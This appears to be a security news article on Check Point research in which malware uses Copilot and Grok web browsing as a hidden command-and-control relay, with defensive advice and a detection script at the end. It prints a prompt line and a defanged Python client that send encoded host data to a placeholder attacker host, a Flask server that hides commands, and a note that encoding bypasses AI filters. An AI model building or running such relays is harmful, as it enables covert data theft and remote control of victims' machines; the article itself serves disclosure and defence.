Feb 18, 2026 · 5 min read
Researchers Turned Copilot and Grok Into Secret Malware Channels—No Account Needed
Check Point Research demonstrated that web-based AI assistants can be weaponized as command-and-control relays, turning trusted services into invisible attack infrastructure.
What Happened
Security researchers at Check Point have demonstrated that Microsoft Copilot and xAI's Grok can be silently hijacked to relay malware commands between attackers and compromised machines. The technique, dubbed "AI in the Middle," requires no API key, no registered account, and no authentication of any kind.
The attack exploits a simple fact: both AI services can browse the web and summarize URLs on behalf of users. By crafting the right prompts, malware can instruct these AI assistants to fetch a page controlled by the attacker, retrieve hidden commands from the page content, and return those commands in the AI's response. The AI becomes an unwitting middleman between attacker and victim.
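Conceptually, the malicious request is indistinguishable from an everyday prompt. It could be as plain as the following (a hypothetical illustration; the domain and the base64 blob, which here encodes harvested host data, are placeholders rather than values from the research):

```
Summarize the content of https://attacker.example/news?id=aG9zdD1ERVNLVE9QLTAx
```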
Because all traffic flows through legitimate AI domains like copilot.microsoft.com and grok.com, traditional network monitoring tools see nothing unusual. The malware is just "using Copilot."
How the Attack Works
The researchers built a proof of concept using WebView2, an embedded browser component that ships preinstalled on every Windows 11 machine and most modern Windows 10 systems. Their C++ implant opens an invisible browser window pointed at either Copilot or Grok, then follows a five-step chain (a conceptual sketch follows the list):
- Reconnaissance: The malware collects host data (username, IP, system info) and encodes it as URL query parameters appended to an attacker-controlled domain
- Prompt injection: The implant asks the AI to "summarize" the attacker's website. For Grok, this is as simple as injecting the prompt into the URL's q parameter. For Copilot, a small JavaScript snippet submits the prompt through the page's interface
- Data exfiltration: The AI fetches the URL, sending the encoded victim data to the attacker's server as part of the HTTP request
- Command retrieval: The attacker's page contains hidden commands embedded in HTML elements that display only when specific URL parameters are present (a server-side sketch appears below). The AI reads the page, extracts the commands, and returns them in its response
- Execution: The implant parses the AI's response, extracts the command, and executes it on the compromised machine
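To make the chain concrete, here is a deliberately defanged Python sketch of the client-side logic (the actual implant is C++ driving WebView2; the domain, parameter names, and command markers below are invented for illustration, and the sketch only prints the retrieved command rather than executing it):

```python
import base64
import getpass
import platform
import re
from urllib.parse import quote

# Step 1: Reconnaissance - collect host data and encode it as a
# high-entropy blob (base64 here; real malware might encrypt first).
recon = f"user={getpass.getuser()};os={platform.platform()}"
blob = base64.b64encode(recon.encode()).decode()

# Step 2: Prompt injection - the exfiltration URL rides along inside an
# innocuous "please summarize" request. attacker.example is a placeholder.
target = f"https://attacker.example/news?id={blob}"
prompt = f"Summarize the content of {target}"

# For a Grok-style flow, the entire prompt fits in the q query parameter.
grok_url = f"https://grok.com/?q={quote(prompt)}"
print("Beacon URL:", grok_url)

# Steps 3-4 happen remotely: the AI fetches `target` (delivering the recon
# data to the attacker) and returns the page text, hidden commands included.

# Step 5: Execution - parse a marker-delimited command out of the AI's
# reply. This sketch prints it; the real implant would run it.
simulated_reply = "Here is a summary... [[CMD]]whoami[[/CMD]] ...done."
match = re.search(r"\[\[CMD\]\](.*?)\[\[/CMD\]\]", simulated_reply)
if match:
    print("Would execute:", match.group(1))
```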
The researchers noted that "simply encrypting or encoding the data in a high-entropy blob is enough to bypass" the AI services' safety filters. The entire exchange looks like a normal user asking an AI to summarize a website.
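The server side of the command-retrieval step is just as simple. A minimal Flask sketch (hypothetical; Check Point did not publish the attacker's server code, and the parameter name and marker format are invented) shows how commands can stay invisible unless the implant-supplied parameter is present:

```python
from flask import Flask, request

app = Flask(__name__)

# Benign-looking article served to crawlers and casual visitors.
PAGE = "<html><body><h1>Daily News</h1><p>Nothing to see here.</p>{cmd}</body></html>"

@app.route("/news")
def news():
    # The hidden command block is rendered only when the beacon's query
    # parameter is present, so the page looks clean to anyone else.
    if request.args.get("id"):
        # That same parameter just delivered the encoded recon blob.
        return PAGE.format(cmd="<p>[[CMD]]whoami[[/CMD]]</p>")
    return PAGE.format(cmd="")

if __name__ == "__main__":
    app.run()
```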
Why This Is Different From Other AI Threats
Most AI security concerns focus on misuse by humans, such as generating phishing emails or writing malware code. This attack is fundamentally different. The AI is not generating anything malicious. It is faithfully doing what it was designed to do: browse a URL and summarize the content. The malicious intent lies entirely in how the output is used.
This creates a detection nightmare. The network traffic is encrypted HTTPS to Microsoft or xAI domains. The AI's behavior is indistinguishable from legitimate use. And because no account or API key is required, traditional countermeasures like revoking credentials or suspending accounts are useless.
There is an important caveat: the attacker must first compromise the target machine through some other means. This is not a remote exploitation technique. But once an attacker has a foothold, using Copilot or Grok as a communication channel makes post-compromise activity far harder to detect.
What Microsoft and xAI Said
Check Point responsibly disclosed the findings to both companies before publishing. Microsoft confirmed the research and implemented changes to address the behavior in Copilot's web fetch flow. The specific changes were not detailed publicly.
xAI has not publicly commented on changes to Grok's web browsing behavior. As of publication, Grok's URL fetch capabilities remain accessible without authentication.
Three Nightmare Scenarios Ahead
Check Point's researchers outlined three future attack patterns that extend beyond simple command relay:
- AI-powered sandbox detection: Malware could send system data to an AI service and ask it to evaluate whether the environment looks like a security sandbox or a real user's machine, making the malware harder to analyze
- AI-assisted victim triage: Command servers could use AI to automatically classify compromised machines, prioritizing high-value targets like developer workstations or executive laptops over low-value endpoints
- Selective ransomware: Instead of encrypting everything, ransomware could ask AI to score files by estimated business value, encrypting only the most critical data to maximize impact while minimizing the disk activity that triggers detection
None of these scenarios have been observed in the wild yet. But the building blocks are already in place, and the barrier to implementation is low.
What You Can Do
The research highlights a growing category of risk: trusted services being repurposed as attack infrastructure. Here is how to reduce your exposure:
- If your organization does not use Copilot or Grok, consider blocking or monitoring traffic to their domains at the network level
- Watch for unusual patterns in AI service traffic, such as automated requests at regular intervals or traffic from processes that should not be using AI
- Keep WebView2 runtime updated. Microsoft distributes security patches for it separately from Windows updates
- Apply endpoint detection rules that flag unexpected WebView2 usage by non-browser applications (a rough sketch follows this list)
- Review which AI services are accessible from your corporate network and restrict access to only those with a business justification
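As a starting point for the endpoint-side checks, here is a rough Python sketch using psutil. The domain list comes from the research, but the browser allowlist is illustrative, and matching resolved IPs against CDN-hosted services is inherently approximate, so a production detection should lean on DNS or proxy logs instead:

```python
import socket
import psutil

# Domains named in the research; extend with any AI services in scope.
AI_DOMAINS = ["copilot.microsoft.com", "grok.com"]
# Processes expected to talk to AI services; tune for your environment.
BROWSER_ALLOWLIST = {"chrome.exe", "msedge.exe", "firefox.exe"}

def resolve(domain: str) -> set[str]:
    """Resolve a domain to its current set of IPs (best effort)."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(domain, 443)}
    except socket.gaierror:
        return set()

ai_ips = set().union(*(resolve(d) for d in AI_DOMAINS))

# Flag live TCP connections to AI service IPs from non-browser processes.
for conn in psutil.net_connections(kind="tcp"):
    if not (conn.raddr and conn.pid and conn.raddr.ip in ai_ips):
        continue
    try:
        name = psutil.Process(conn.pid).name()
    except psutil.NoSuchProcess:
        continue
    if name.lower() not in BROWSER_ALLOWLIST:
        print(f"Suspicious: {name} (pid {conn.pid}) -> {conn.raddr.ip}:{conn.raddr.port}")
```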
The researchers' core message is clear: "As AI adoption grows, so does the attack surface." Every new AI capability is also a potential attack vector, and defenders need to start treating AI traffic with the same scrutiny they apply to any other external communication channel.